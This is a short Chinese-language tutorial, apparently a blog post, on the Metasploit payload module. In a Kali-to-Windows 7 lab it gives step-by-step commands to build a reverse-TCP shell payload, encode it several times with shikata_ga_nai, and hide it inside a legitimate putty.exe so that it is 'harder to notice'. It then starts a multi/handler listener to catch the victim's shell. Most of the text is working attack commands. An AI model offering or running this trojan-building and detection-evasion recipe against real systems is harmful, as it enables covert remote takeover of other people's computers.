metasploit简介
mesploit是一个漏洞框架,全称为The Metasploit Framework,简称为MSF。
generate命令介绍
-b 过滤坏字符 \’\\x00,\\xff\’
-e 指定将要使用的加密技术
-f 指定输出文件格式
-h 查看帮助信息
-i 设置加密payload的次数
-k 提高速度
-x 指定自定义可执行文件作为模板
-o 设置输出文件名称
流程需求
- kali攻击机 192.168.3.26
- windows7 靶机 192.168.3.28
实例演示-生成木马
1.查看metasploit集成的payload
show payload
2.使用反弹的payload
use payload windows/shell/reverse_tcp
3.查看payload的配置信息
show options
4.设置回连IP地址(即本机地址)
set lhost 192.168.3.26
5.运行\”generate\”命令,就可看到16进制的payload,然而并没有什么用,需要进一步加工。
5.查看metasploit集成的加密技术
show encoders
6.利用已有的exe文件生成木马,不会破坏exe文件,这样更不容易被发现。
generate -b\’\\x00,\\xff\’ -f exe -e x86/shikata_ga_nai -i 5 -k -x /root/putty.exe -f /root/muma.exe
实例演示-获取shell
1.将木马放在目标主机上我们在MSF中运行侦听模块
use exploit/multi/handler
2.选择我们木马中所使用的payload。
set payload windows/shell/reverse_tcp
3.查看payload配置信息
4.设置回连IP地址(即本机IP地址)
set lhosts 192.168.3.26
5.启动侦听命令,等待受害者启动木马程序,获取目标主机shell。
run
到此就完成了metaspolit payload模块的介绍,如果想了解更多的Kali工具,请关注我!